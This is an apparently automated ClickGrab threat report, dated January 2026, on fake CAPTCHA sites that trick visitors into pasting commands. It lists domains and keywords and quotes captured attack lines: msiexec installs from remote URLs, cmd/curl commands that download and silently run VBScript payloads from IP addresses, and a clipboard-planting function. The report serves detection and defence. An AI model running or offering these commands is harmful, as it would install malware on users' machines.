ClickGrab Threat Analysis Report - 2026-01-30
Generated on 2026-01-30 03:24:42
Executive Summary
- Total sites analyzed: 97
- Sites with malicious content: 45
- Unique domains encountered: 298
- Total URLs extracted: 3,127
- PowerShell download attempts: 1
- Clipboard manipulation instances: 243
Domain Analysis
Most Frequently Encountered Domains
- baovechuyennghiep.baovengayvadem.com: 700 occurrences
- cf.bstatic.com: 244 occurrences
- adturekorea.co.kr: 214 occurrences
- www.booking.com: 204 occurrences
- 3.71.235.243: 136 occurrences
- 18.176.47.246: 112 occurrences
- www.yppgiibandung.org: 102 occurrences
- 54.197.245.249: 64 occurrences
- circlear.grad.hr: 62 occurrences
- 3.18.128.17: 51 occurrences
- 44.208.147.17: 48 occurrences
- www.google.com: 44 occurrences
- horvers.net: 42 occurrences
- secure.booking.com: 38 occurrences
- casa-ananda.cl: 38 occurrences
URL Pattern Analysis
reCAPTCHA imagery
5 occurrences across 3 distinct URLs
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(2 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit(1 times)
Font resources
36 occurrences across 20 distinct URLs
https://fonts.gstatic.com(4 times)http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf(4 times)http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf(4 times)https://fonts.googleapis.com(2 times)https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)- ...and 15 more distinct URLs
CDN hosted scripts
13 occurrences across 11 distinct URLs
https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css(2 times)https://cdn.cookielaw.org/scripttemplates/otSDKStub.js(2 times)https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js(1 times)https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js(1 times)https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js(1 times)- ...and 6 more distinct URLs
Google resources
70 occurrences across 23 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(37 times)https://fonts.googleapis.com(2 times)https://plus.google.com/105443419075154950489(2 times)https://carrier.booking.com/google/places/webautocompletesimple(2 times)https://www.googletagmanager.com/gtm.js?id=GTM-5Q664QZ(2 times)- ...and 18 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 796 (72 unique)
Keyword Categories
Social Engineering
26 unique keywords
robotexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";verification_idcommand =msiexec /i https://i-iike-eie-phants-verification.iive/iamchaiienge/verification/UserID7383526;Robotexec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";Verification HashVerification IDI am not a robotChecking if you are human- ...and 16 more
System Commands
34 unique keywords
command = 'msiexec /i http://inkbookwriters.com/verify';Command = cmdEiement.getAttribute('data-reai-command');command box */cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';command into the terminai and press <kbd>Enter</kbd>.</ii>exec /i http://inkbookwriters.com/verify';Command ⌘</kbd> + <kbd>Space</kbd> to open Spotiight.</ii>cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';Command =windows_command;cmd- ...and 24 more
Verification Text
3 unique keywords
ray idhiddenHidden
Technical Terms
9 unique keywords
XMLHTTPPress EnterPress CTRL + V.exeBypassiexWinHttpRequestResponseTextRay ID
Most Frequent Keywords
- hidden: 65 occurrences
- robot: 58 occurrences
- Robot: 46 occurrences
- verification: 46 occurrences
- Verification: 41 occurrences
- I am not a robot: 40 occurrences
- Verification ID: 39 occurrences
- Ray ID: 39 occurrences
- CAPTCHA Verification: 39 occurrences
- verification-id: 39 occurrences
- To better prove you are not a robot: 39 occurrences
- Verify you are human: 38 occurrences
- Checking if you are human: 37 occurrences
- const command =: 37 occurrences
- cmd: 21 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: robot, Robot
Group 2: hidden, Hidden
Group 3: command into PowerSheii and press <kbd>Enter</kbd>.</ii>, command into the terminai and press <kbd>Enter</kbd>.</ii>
Group 4: Verification ID, verification, Verification, verification-ioader, verification-id, verification id, Verification Hash, verification_id
Group 5: Ray ID, ray id
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
themes/Cioudfiare/Verification/UserID63894525i5832com/recaptcha/about/images/reCAPTCHAiVBORw0KGgoAAAANSUhEUgAAAv4AAAMACAYAAABcimNkAAAABm...iive/iamchaiienge/verification/UserID7383526handleAppleCaptchaChange
Clipboard Manipulation Analysis
Detected clipboard manipulation in 243 instances.
Document.Execcommand Copy
Found in 121 snippets (49.8% of clipboard code)
Examples:
document.execCommand("copy")
document.execCommand('copy')
try { document.execCommand('copy')
Textarea Manipulation
Found in 122 snippets (50.2% of clipboard code)
Examples:
ng is the safe placeholder above const textarea = document.createElement('textarea'
fallbackCopyToClipboard(text) { const textArea = document.createElement("textarea"
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.